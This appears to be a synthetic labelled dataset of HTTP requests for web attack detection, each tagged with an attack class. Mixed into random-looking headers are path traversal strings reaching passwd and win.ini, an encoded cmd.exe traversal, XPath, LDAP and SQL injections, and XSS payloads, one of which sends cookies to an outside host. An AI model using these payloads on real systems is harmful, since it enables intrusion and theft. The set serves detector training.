GET /httpswS.5S/AcI6Rb_AoA3optpasswdN/aettnr0oeooBnnio/rfhanaoNNid/iwRy92C0/oyLuubEqtT2aooh/ivneIrsaiessmh/rE6G/1lds8tbr.mspx?neer3eheeE3hn=whtobject&lnawimOa8gto4E=%5D8cxea7gvq&nlatfldhwn=041&tbM5jRrcpZ=sfisbyqlkawpoht&gRleudao=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&had3Awic=iHp8LDl%40wKGq HTTP/1.0
Host: www.sekie.de
Connection: txac
Accept: video/quicktime, application/x-tar;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: f5hdoo0a-v, t-cgCea, of-t8;q=0.2, odxxrTo-u1a;q=0.8
Cache-Control: max-stale
Client-ip: 231.150.7.86
Cookie: IweLJP@JheFscript=en8lG2ii
Cookie2: $Version="99"
Date: Mon, 25 Aug 08 02:12:34 UTC
ETag: W/"4GaIFePkNWXt7fmQSf7"
Expect: hoahd=l6nt2Ete;SDpta=EeAen5
From: eftra@neleobejy.com
If-Modified-Since: Tue, 24 Nov 09 19:46:52 UTC
If-Unmodified-Since: Wed, 28 Apr 10 07:27:19 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 05 Feb 06 21:43:12 GMT
Max-Forwards: 96
MIME-Version: 1.9
Pragma: z1xn5hue='da'
Proxy-Authorization: Digest uri=http://a8bl.ch/noetzkll/itbnanre/awsc.jsp
Authorization: s6pdda ea3cu=aayoIiv
Range: 56-3,6-
Referer: /iaa0ecs.sh
TE: deflate;q=0.9,trailers
Trailer: Expect
User-Agent: Mozilla/0.1 (Windows; U; Win 9x 4.4; iN-ox; rv:1.4.5) Gecko/73013053
UA-CPU: 68000
UA-Disp: 3006,9406,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7340x8822
Via: 5.9 194.136.148.206, iis6mO/4.7 www.vInnB.png
Transfer-Encoding: deflate
Upgrade: Sdb/4.1
Warning: 061 www.aomelt.jpeg "e3tta" "Tue, 23 Jan 07 20:12:20 GMT"
X-Forwarded-For: 211.19.211.211
X-Serial-Number: 79986231728889
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46242
Start - Id: 36078
class: PathTransversal
GET /1L1hUKOp6Z.access_log/mntargmusansyqr/sw/wllgoiahgraa/me/euwoiTZ1PXrd6oDr@dBr.exe?isat=%5Ddno5ktw80tox&ttre3srsosaz=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fra%2Fta%2Fenre%2Fti.sh&VxqQoBb=moPrexecsg%28gafrbno&yeaba=wPzeuWqUd&ied1xkdtrcRBt=45892747&irtgz22oHmokj=ondUtre HTTP/1.0
Host: www.ltrUittt.ch
Connection: close
Accept: */*;q=0.8
Accept-Charset: koi8-r;q=0.6, x-mac-icelandic
Accept-Encoding: deflate, gzip, identity
Accept-Language: n-t7i, ilxazhah-scwoe;q=0.4, grmzsaRr-ezeisd;q=0.9, Eeedels-At
Cache-Control: only-if-cached
Client-ip: 150.142.192.26
Cookie: lrtu=8gqwtUub7j;Rugumzjq=aemmetch
Cookie2: $Version="080"
Date: Thu, 23 Dec 04 24:04:30 UTC
ETag: W/"CHRBHIdtJ0gNNdG"
Expect: 100-continue
From: Esva@5c4oorIai.it
If-Modified-Since: Tue, 02 Jan 07 09:51:21 CET
If-Unmodified-Since: Fri, 23 Nov 07 08:04:32 UTC
If-Match: *
If-None-Match: "yf1XiIeeQHcng@K"
If-Range: Thu, 01 Apr 04 09:09:13 UTC
Max-Forwards: 4
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic ZXd3b2Y6aHh0YQ==
Authorization: diW0 aiue8nd=tsaL
Range: 67-310757
Referer: http://www.nddIe.fr/Edt2.html
TE: chunked;q=0.9,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/7.9 (X11; U; Open BSD i586 7.7; ea-Yd; rv:5.1.2) Gecko/43418103
UA-CPU: Sparc
UA-Disp: 6269,3972,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 039x0543
Via: 6.4 34.115.139.143:7255, 2.0 97.153.193.135
Transfer-Encoding: deflate
Upgrade: sztad/3.9, y9oto/3.0
Warning: 082 205.217.116.11 "oJcacgojmdrj" "Sun, 02 Dec 07 19:43:37 UTC"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36078
Start - Id: 48864
class: XPathInjection
GET /25Vand4NopeniframeN_l5vLaccept/gFV25ydmx3Aw/owz0n/eto/UwEt77s0dYht8UC/ywBgi6N75bvpH/1passthruJBCsFWpATqL/da.htm?TbveRBcEIc=t6hoo%27+++++or++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or++++%27i8%27%3D++++%27&astn=eh&he5Els@K-8%u=lI%5Dzd1r9n7o&aM8SJdc=r.Q.RtMFku9&aea8iy=io+iehtaccesv0avar&eosHczbE2r=ultiethu0esdh9hmOn&2nt=wtCtfaeidEeh4heyj&szoxml_httpsNDCs=386464425&nwsr=848559836&lweymasMeym=rcQcwYluMt&ieoeNesef3l=eEoNmhtatsrlel0n HTTP/1.1
Host: 138.146.86.34:80
Connection: close
Accept: application/*;q=0.4, image/*;q=0.2, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 140.96.120.238
Cookie: Felnsshb=gWUS1IMXXS;pgnwEa=veqch;wfss=97888;zrxLe=fezVi64
Cookie2: $Version="570"
Date: Thu, 22 Jul 04 10:58:53 GMT
ETag: "_fRV_D@7oKn-qsK"
Expect: dn6t
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Fri, 21 Apr 06 11:00:05 CET
If-Unmodified-Since: Fri, 16 May 08 02:48:36 GMT
If-Match: *
If-None-Match: *
If-Range: "LPef6cjtWNcOfUwTd"
Max-Forwards: 3
MIME-Version: 4.5
Pragma: ean=reridto
Proxy-Authorization: Basic aHdmYTY6RXk3aw==
Authorization: 3Elb a13g7hsC=Namthsh
Range: 692-,-672,-664068
Referer: http://cte1adS.org/omtAref/vlhes.cgi
TE: chunked;q=0.7,chunked,gzip;q=0.0
Trailer: Accept-Charset
User-Agent: huonual (w9R@._)
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: et24ca/3.0 254.56.23.172, 4.2 82.111.102.222
Transfer-Encoding: compress
Upgrade: cntr/0.2, fRir/4.0, qalsS/7.9
Warning: 031 102.38.172.102 "nisa2e2yv" 
X-Forwarded-For: 156.103.50.172
X-Serial-Number: 043440
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48864
Start - Id: 44089
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: 59.227.35.188:028
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: windows-1254;q=0.6, x-mac-korean;q=0.3, iso-8859-3;q=0.9, cp-936;q=0.6, us-ascii;q=0.2
Accept-Encoding: 
Accept-Language: lse2-qn0wd;q=0.0
Cache-Control: no-transform
Client-ip: 56.136.139.128
Cookie: eeeiMopenP=990;il=vsed;lcnrr5s2a=10368556;@RUTJMIHf=89428;7F@epGNNrE03=ntu5;zuysesujo45mied=d
Cookie2: $Version="0"
Date: Thu, 04 Mar 04 20:28:51 UTC
ETag: "CFu08e9ETvSFfKNT.C"
Expect: 1ewSot=i8my
From: ixam@eaec.uk
If-Modified-Since: Wed, 08 Aug 07 16:35:02 UTC
If-Unmodified-Since: Sat, 01 Oct 05 18:17:51 GMT
If-Match: *
If-None-Match: *
If-Range: "nqyUNpCJJmNI08R"
Max-Forwards: 08
MIME-Version: 0.4
Pragma: tpee3pwh=etrzuti
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: Basic dmVtdGw6NHRoZWhl
Range: 70-
Referer: http://6ana.ch/texat.jsp
TE: trailers,deflate,deflate
Trailer: Authorization
User-Agent: Mozilla/7.4 (Machintosh; U; PPC 0.7; sr-st; rv:6.7.4) Gecko/16304461
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1501x189
Via: 3.2 www.wdri72.tiff
Transfer-Encoding: nenE; dce7=waEe
Upgrade: unHis2/9.7, sDw/8.7
Warning: 578 121.175.223.34:52334 "pneeY2IslooLh" 
X-Forwarded-For: 91.48.222.8
X-Serial-Number: 388289600968011
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44089
Start - Id: 47682
class: XSS
GET /elkfhs/i1w5ad3swaeeteat.gif?DOe5L1v=7906&eelrErOec=pe+pa+%272ey&fcaewg2siintd1=nxdnoax5laii%3F1&tr=3737443&tmG5ErTovsyet9=y_na4W8LkG&iZvarLapositionGNlibx3f=0&oaLiE9aD=aHe2hsuueoue0&theluh0rdms=sE6%3A8lrtrs&L0oaws=%3Cdiv++style%3D+++%22+++++behaviour%3A++++url%28%5Bhttp%3A%2F%2Fwww.ngit.com%2Fscript%2Fnnnde8o.pl%5D%29%3B++++%22++%3E&RLCsean4=sphzcms HTTP/1.1
Host: 229.226.199.99:80
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 99.240.245.14
Cookie: pjaswT2=196740605
Cookie2: $Version="699"
Date: Wed, 22 Feb 06 11:56:57 GMT
ETag: W/"1J-g4mVQQ066LcLj0iD8"
Expect: 100-continue
From: 25osyn@hmnsy.org
If-Modified-Since: Tue, 13 Nov 07 02:19:42 GMT
If-Unmodified-Since: Thu, 19 Mar 09 20:54:37 UTC
If-Match: *
If-None-Match: "pLvXZnxw1FRZ8P24f4Bj"
If-Range: Mon, 23 Apr 07 04:49:35 CET
Max-Forwards: 784
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM eXR0b2RubmMwbEhzaWVlZWUzZWhpZTJtcm5ucmluQWVzdzk2T3JlcmFUanU=
Authorization: Basic ZHNub2hvOmVtaHY=
Range: 70-,2-,3-3356
Referer: /nsitxd.gif
TE: trailers,chunked,chunked
Trailer: From
User-Agent: Mozilla/6.9 (Windows; U; Win 9x 4.9; iO-kh; rv:0.0.5) Gecko/75715072
UA-CPU: 68000
UA-Disp: 9242,0652,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 934x7117
Via: 0.4 0.114.127.182:98626
Transfer-Encoding: identity
Upgrade: gnEas/1.7, t6e4/9.4, 6sseci/3.1, daIRa/3.5, livoLt/6.1
Warning: 797 10.182.112.205:62 "mparhiqesWqMnqIet2" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47682
Start - Id: 46521
class: XSS
GET /<SCRIPT>/? HTTP/1.1
Host: www.oTteevto8s.gov:850
Connection: v9we9el
Accept: */*;q=0.6
Accept-Charset: koi8;q=0.9, x-mac-korean, x-mac-cyrillic, x-mac-roman
Accept-Encoding: gzip;q=0.1, deflate;q=0.6, identity
Accept-Language: W-o, daineu-ethRi, hc-hh2aa;q=0.1
Cache-Control: o='neha'
Client-ip: 162.23.121.215
Cookie: Nfnudc6pmtg=e7Rm
Cookie2: $Version="92"
Date: Wed, 28 Feb 07 09:51:20 GMT
ETag: "aNVJT2lKpqFCO9DMA"
Expect: 8enk=l68tr
From: eHTlcetd@ogsi0oerkl.biz
If-Modified-Since: Fri, 16 May 08 19:11:52 GMT
If-Unmodified-Since: Thu, 22 Sep 05 02:18:48 CET
If-Match: "wa6B8W4dHwr_V0Uo.1if"
If-None-Match: "pxj_m.gXQ6E2vKg"
If-Range: Mon, 20 Apr 09 22:49:04 UTC
Max-Forwards: 43
MIME-Version: 9.6
Pragma: S='ionaepTS'
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: evg2o7 3usa9ee=Jqio83
Range: -97604
Referer: /is0tegi/tetvrt/mxmum/ourwlr/aogx57.asmx
TE: chunked;q=0.5,gzip
Trailer: If-None-Match
User-Agent: atetioe
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: HTTP/2.6 www.nRlS.tiff
Transfer-Encoding: gzip
Upgrade: lAi/5.0, Nac/9.0, NeseBu/6.1, 6tswwc/0.1, it7Ey/2.3
Warning: 496 54.104.249.69 "iplf" "Fri, 06 May 05 07:10:25 GMT"
----: --------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 46521
Start - Id: 36955
class: LdapInjection
POST /tmN2Y8FDQMK.1Oa-/_VGI8/3dF-wFZ/jE/H86Yallinclude58EAWD-f/4_/ye8GQ6HMVTb8e1LF2z/bohautjirtDu6ibofOnh/eUlrnet7ax3s/es4k-Cc0ve.css? HTTP/1.0
Content-Length: 354
Content-Language: eiEtm
Content-Encoding: identity
Content-Location: http://www.oTrn.net/ptprmaxg.mdb
Content-MD5: bmVFZGlFb2EybUlubG55YQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 24 Feb 09 02:01:07 CET
Host: 199.117.207.214
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-3;q=0.1, iso-8859-3;q=0.6, isiri-3342
Accept-Encoding: identity, gzip;q=0.6, identity;q=0.4
Accept-Language: *;q=0.6
Cache-Control: h=ilooi
Client-ip: 216.121.4.71
Cookie: Ao7yecxAt=99;ieeu5sc2tuWssb=ni;e7=ti$4bsmbefr8rl;fn=wc;rDsoo4xio1svis=aUb_I_fNMh8F
Cookie2: $Version="0"
Date: Tue, 11 Apr 06 03:52:08 UTC
Expect: 100-continue
If-Modified-Since: Thu, 28 Jun 07 18:02:48 GMT
If-Match: *
If-None-Match: *
Max-Forwards: 2
MIME-Version: 6.6
Authorization: NTLM b3RuY1NDbmFFVGVFSHVhbjZlcmVmNmhuN29jZWV6bWljbmVybWNsbUVoZWxoOQ==
Range: -69,-806
Referer: http://eiBi.be/idriep/pbptt.swf
TE: gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.1 (X11; U; Solaris 6.3; pN-fa; rv:1.9.4) Gecko/65954473
UA-Disp: 5315,7595,8
UA-OS: Win98
UA-Color: color32
Via: 2.8 173.92.208.151, 0.6 175.202.62.252
Transfer-Encoding: gzip
Upgrade: 6tB6f/7.1, gniost/8.4
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2csnfoNrs2ctt=28840&ah1hrne=5985342&eis8=28&Fiframe5RpOb1shutdown=Ceautoexecrcp&leetahEise=lehNfric&utr=63543619&eOeoddm=870)(&(objectClass=bdtt)(|(sn   =   tu)(cn=yl   J*))&be=tautoexechc&L@pNI-X=0111495&ralzlh5n=oriant&rgae4sUmet=ynorso9udsdtioees&eehaujeo5Deu=eluGhuldtihusv&mr55ers=iI&j62xVhr=uTOtehi7dnh&nb1F-A=59288313

End - Id: 36955
Start - Id: 45132
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: www.smad.biz
Connection: close
Accept: */*;q=0.7
Accept-Charset: us-ascii;q=0.1, euc-kr, utf-8;q=0.0
Accept-Encoding: gzip;q=0.0
Accept-Language: tl-ziooisdh;q=0.2, moa-nrs;q=0.8, qfl0-eurnq;q=0.5, le-hyhrn;q=0.5, 5Acn-9zsEiobn;q=0.4
Cache-Control: max-stale
Client-ip: 175.81.181.89
Cookie: eCaoEedeah=57915802;ey6yewmoa=SerAt
Cookie2: $Version="6"
Date: Sat, 29 May 04 14:36:12 CET
ETag: W/"qlX4ysgfATZLcpalHWf0"
Expect: 100-continue
From: afmCdmi@eoebf6ie.gov
If-Modified-Since: Tue, 07 Jun 05 15:56:38 CET
If-Unmodified-Since: Sun, 06 Mar 05 19:41:35 GMT
If-Match: "8PKuo6XXt4fC9T06BtR"
If-None-Match: "3y0d5VFUVJqetjWtD"
If-Range: Sat, 19 Dec 09 23:16:24 UTC
Max-Forwards: 1
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: Basic dHQwSWFicjo3c2FpYXM=
Range: -3,456-488022
Referer: /Trotyoeg/islemr/eoisbiH.mp3
TE: deflate;q=0.4,trailers,gzip;q=0.0
Trailer: Host
User-Agent: Mozilla/6.5 (Windows; U; WinNT 4.2; og-0j; rv:0.3.4) Gecko/13864400
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0464x327
Via: FTP/7.6 www.trsl.jpeg, eia/5.1 248.65.64.243:0, HTTP/0.3 www.scdeq.shtml
Transfer-Encoding: deflate
Upgrade: rnttO/3.2, lWf/3.6
Warning: 694 75.28.35.212 "sieenweirr1p" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: ---------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45132
Start - Id: 47236
class: XSS
GET /8AElexecmetae/dJVVfACj/iTX-ItVIES8.4/x.6jMkz.21a7.a2UuMt/Ss/oO2Uwaa2U3Dayarqz/iMa8m9qc9CwR/eqbUNU4ATIo94.tiff?aoiee7the=799&neoy8i5iw=%3Cmeta++http-equiv+++%3D%22+refresh+%22+++++content++%3D%22+++0%3Burl%3Djavascript%3A++%5Bwindow.open%28%27http%3A%2F%2F189.252.58.189%2Ferst.mspx%27%2Bdocument.cookie%29%3B%5D%22+++%3E&67thxlip=+ih&iih=k%40ao&csa4ykr=objecta+3e7id+oo+email HTTP/1.0
Host: 207.167.139.248:0
Connection: close
Accept: application/*, application/rtf
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=926
Client-ip: 226.163.167.76
Cookie: r6u=4639566;j0YdzUHM70=3;ioe39=l;i1desrbrmu1o=yhNq =gnSm-t 3between;biGlHnt=t2:
Cookie2: $Version="633"
Date: Fri, 05 Mar 10 18:47:05 GMT
ETag: W/"IpFYpz7hjp_CCGyUyX6"
Expect: 100-continue
From: oreAv@osmi3u.be
If-Modified-Since: Sun, 02 May 10 18:48:53 GMT
If-Unmodified-Since: Sun, 21 Oct 07 09:54:34 GMT
If-Match: "LtcuKYm7fV9WbEX7Rj"
If-None-Match: "Z4LV9FHYLJ8Svn8ND"
If-Range: Fri, 14 Dec 07 14:29:50 GMT
Max-Forwards: 9783
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest response="53819Da8f4aCf6baeFB99dfFAfDaDCBc"
Authorization: NTLM bmFpdGFUcGwzYWJveXROZHVUY3RuYXAyd255Z3pBc29p
Range: -040129,-2915,414879-
Referer: /iatot/isruhd/Mna4.jsp
TE: gzip;q=0.7,chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.4 (X11; U; Linux i586 5.2; oR-nw; rv:7.8.2) Gecko/55102021
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7301x0518
Via: HTTP/7.8 149.51.45.48
Transfer-Encoding: deflate
Upgrade: sos/0.3, 9e6etg/6.5, wc2/6.5, nsbd/1.7
Warning: 809 www.usatae.gif "ooabotEle" 
X-Forwarded-For: 230.35.184.69
X-Serial-Number: 81818061997454
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47236
Start - Id: 43956
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: www.l7j6uy6th.gov
Connection: sjA5i9
Accept: image/*
Accept-Charset: hz-gb-2312, iso-10646-ucs-2, iso-10646-ucs-2;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 167.244.39.243
Cookie: npIaiwrDtlern=91533
Cookie2: $Version="790"
Date: Thu, 03 Feb 05 14:13:15 UTC
ETag: W/"g.zs56ap96bucj4wI"
Expect: Ktdna
From: axenii@lMdner.de
If-Modified-Since: Thu, 19 Jul 07 16:11:30 GMT
If-Unmodified-Since: Tue, 26 Sep 06 03:10:26 UTC
If-Match: "ODgc4cyMJr@4jwx32IM"
If-None-Match: "4Ib8nR.KnYokT6Z@pfKr"
If-Range: Sat, 24 Jan 04 24:31:49 UTC
Max-Forwards: 85
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM bmxnaGZjaGlvaHRyYm50MDZicmlncFptY3FUc25pbXp0c3J2YmhodHk=
Authorization: Digest realm
Range: 97793-3,500796-0
Referer: /5nse4eh/9oao/tlnn7Cy/zpBZsmie/stteTicn.wav
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/5.0 (compatible; MSIE 5.1; Win 9x; qlrf58aiee)
UA-CPU: 68000
UA-Disp: 7638,7203,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4200x926
Via: FTP/8.0 108.237.253.181:89, HTTP/4.4 209.128.105.216
Transfer-Encoding: gzip
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: ----------
~~~~~: ~~~~~~~~~~

null

End - Id: 43956
Start - Id: 45584
class: PathTransversal
GET /azean/txe7p@lEBJsq/ilh7s/alst/rehloeovripyTaer/G0KRWvbscript8CT7P/o8ierkoohocunNtm.cfm?s9ois=%3Fe+allkntK3Teon&yeUbrtsa=location%27servicesselecteat+I&ewuxEs=131802213&323G7y=r--Y&1j2cshutdownO=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&rlhx=ophidh6%5Ctsa&csNs1p=eetbody2oDnhsnph-nea8&ouliHI1=9KyY1n6IwSbZ&iRcb@documentS=n6F.2wpt3S7&6lrLfNiMJedb=eRa5 HTTP/1.1
Host: 209.231.106.173:9
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 181.101.28.152
Cookie: rnryest5s=c2(b$ tt ai0ai0ir O;luemoom4=Woetan
Cookie2: $Version="513"
Date: Tue, 12 Oct 04 22:11:19 UTC
ETag: "W@5PqyMvVxHHDy-"
Expect: 100-continue
From: v9zS@tEnsif6n2h.net
If-Modified-Since: Thu, 18 Aug 05 09:09:31 UTC
If-Unmodified-Since: Sun, 11 Apr 10 05:48:17 GMT
If-Match: "V.8LK4n69-kgXicgta"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 9.5
Pragma: DQ='ueiti'
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="3e092Ba963B0CA1f5a1fBABba2dDf2bE"
Range: -3163,-605229
Referer: /ethwe/mtebex.cgi
TE: chunked;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: eNhdioiHem
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6460x166
Via: 0.6 230.210.43.29, HTTP/1.0 www.rssichs.htm
Transfer-Encoding: gzip
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 987 134.153.100.236 "eesinenge5NOla6sS" 
X-Forwarded-For: 58.229.7.205
X-Serial-Number: 368281150283459
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45584
Start - Id: 49155
class: XPathInjection
GET /iEGlCEm.shtml?Orams1ei7yts=kg&neEa=Dlutbntn%27++++or++++1%3C++gt%2FleiRye%2FUoy%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D38%5D+++++or++++%27h0ilstT%27%3D+%27&ynlha1mrx=fchq&op=Nft%28enCnns&noee3qe8o2emi=nnfhi%3Ce&nkonaiynnm=3&edteerTets=8&os=3tln0xTtksca&RO2y3Ne0=34040&9iwmmrWin4=aIOk HTTP/1.1
Host: www.nsetco.it
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: eEssi-tnrm, hh-asash;q=0.8, 5-7, i-tt, apWpde-O;q=0.3
Cache-Control: max-age=12101
Client-ip: 38.175.250.11
Cookie: nledc=96;hle=io96RU95j
Cookie2: $Version="3"
Date: Sun, 15 Jun 08 14:53:03 CET
ETag: "HjF@45Djy@lcchXqG"
Expect: eshvO0e=esaion
From: esgt1xrh@tidc.com
If-Modified-Since: Wed, 23 Mar 05 22:12:40 UTC
If-Unmodified-Since: Sun, 12 Dec 04 22:21:01 UTC
If-Match: "0RYhKtFgl@DG.dlBDTr"
If-None-Match: "Mazg8XbKL3VIELWPOlY5"
If-Range: "OJIvPTeS_@EyuqIPocg"
Max-Forwards: 85
MIME-Version: 4.0
Pragma: xvt='i'
Proxy-Authorization: Digest opaque="Mpzdea"
Authorization: woeb tyitxgi=npaonat
Range: 4916-
Referer: http://cioo7.de/SabrxTt/qtsz3ttn/o8lnew/agles.wav
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/2.7 (Machintosh; U; PPC Mac OS X 4.5; n9-nu; rv:2.3.0) Gecko/94230451
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7758x5013
Via: 9.8 www.ilhtnqh.htm, josbee/4.8 224.138.98.121:343, 9Vm/1.4 97.33.5.245
Transfer-Encoding: gzip
Upgrade: yH0dti/9.2, nraa/7.9, tqua9/4.2, chhtia/5.9, see23/7.6
Warning: 246 47.3.57.5 "Oy3t1cdrbj" "Mon, 24 Sep 07 19:56:45 GMT"
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49155
Start - Id: 45268
class: PathTransversal
GET /N9TDeY6Ftmp52DN/ru@Ox-H/nKMAYG/t.Lk7MM/oVeVNLeSHHpositionSg-/ej@/hi.jpeg?qs=53349494&ftnsRa6=7esne&lmsystemZ=tu+naerU&iCua=nlu0+vwdot HTTP/1.0
Host: www.gusiSiie.org
Connection: hk0e
Accept: */*;q=0.6
Accept-Charset: iso-8859-3;q=0.1, iso-8859-1, iso-2022-jp, iso-2022-jp;q=0.4, iso-2022-jp
Accept-Encoding: gzip;q=0.5, identity, deflate, deflate;q=0.7, gzip
Accept-Language: satoe2wt-etr;q=0.6, 0nrM6a-mrui3ry;q=0.3
Cache-Control: max-age=7496
Cookie: pesaatoR56y=f;noqu=0606;IiauttpR=sphWeatweeM
Cookie2: $Version="48"
Date: Fri, 05 Mar 10 23:28:12 CET
ETag: "_6bFj6M4O-5p6MfZP_"
Expect: 100-continue
From: ra7rtweh@ttrsy.org
If-Modified-Since: Tue, 27 Apr 10 14:27:51 UTC
If-Unmodified-Since: Sat, 29 May 04 23:21:01 UTC
If-Match: "ftKOEsMQmvY8Hdf"
If-None-Match: "APUUCG3kwkTUo5cNtCwb"
If-Range: Sun, 05 Aug 07 21:41:07 CET
Max-Forwards: 0420
Pragma: no-cache
Authorization: D8eHoh 1rni3j=gegeWtl
Referer: http://7Ahe.it/oMsToe/olo0Sat/ldnmq/tdat.js
TE: chunked,trailers,trailers
User-Agent: ..\..\..\..\WINDOWS\system.ini
UA-CPU: Sparc
Via: rlin/3.4 210.103.236.155
Transfer-Encoding: deflate
Upgrade: rY7u/3.8, gk6/3.2, o8xHs/4.5, eog/8.6

null

End - Id: 45268
Start - Id: 42006
class: SqlInjection
GET /patTt6e/o9/q.UbuincludeQJjMBpH/Sn1nsusi1dewtulsal/vic.asp?voltkctCpdolmsd=es%27iot8k++cboot.iniidnadminoo&AkUhtpassscriptJF=OR++%27kisNe%27+%3D++++%27Sim%27%2B%27ple%27 HTTP/1.0
Host: www.irgErriit.biz
Connection: keep-alive
Accept: video/mpeg;q=0.0, application/postscript;q=0.9
Accept-Charset: ks_c_5601-1987;q=0.3, euc-cn, iso-8859-2, windows-1255;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-age=36
Client-ip: 11.178.28.161
Cookie: tHt=4ihwnarme;nrIre=hAlarnveokppAT
Cookie2: $Version="53"
Date: Tue, 27 Jan 04 13:00:26 GMT
ETag: "B3glT-8JF-SL@BPzG.S"
Expect: 100-continue
From: ainlfaqa@smAa.fr
If-Modified-Since: Wed, 14 Feb 07 08:05:21 UTC
If-Unmodified-Since: Mon, 31 Jan 05 04:25:35 CET
If-Match: *
If-None-Match: "yCrHjkz3RK0Ko@R3q@8f"
If-Range: *
Max-Forwards: 0
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest uri=/oyooyi/aelsuo1/iteo/eu7usa/EDiri.cfm
Authorization: Digest opaque="4venij"
Range: -2,-9858,-988607
Referer: http://pae6gA.uk/osnf5/iutl/gtaiApAj/sny6aeon/seobhoe.png
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/6.9 (Windows; U; Win98 4.4; 6z-er; rv:0.3.5) Gecko/11847185
UA-CPU: StrongARM
UA-Disp: 442,012,8
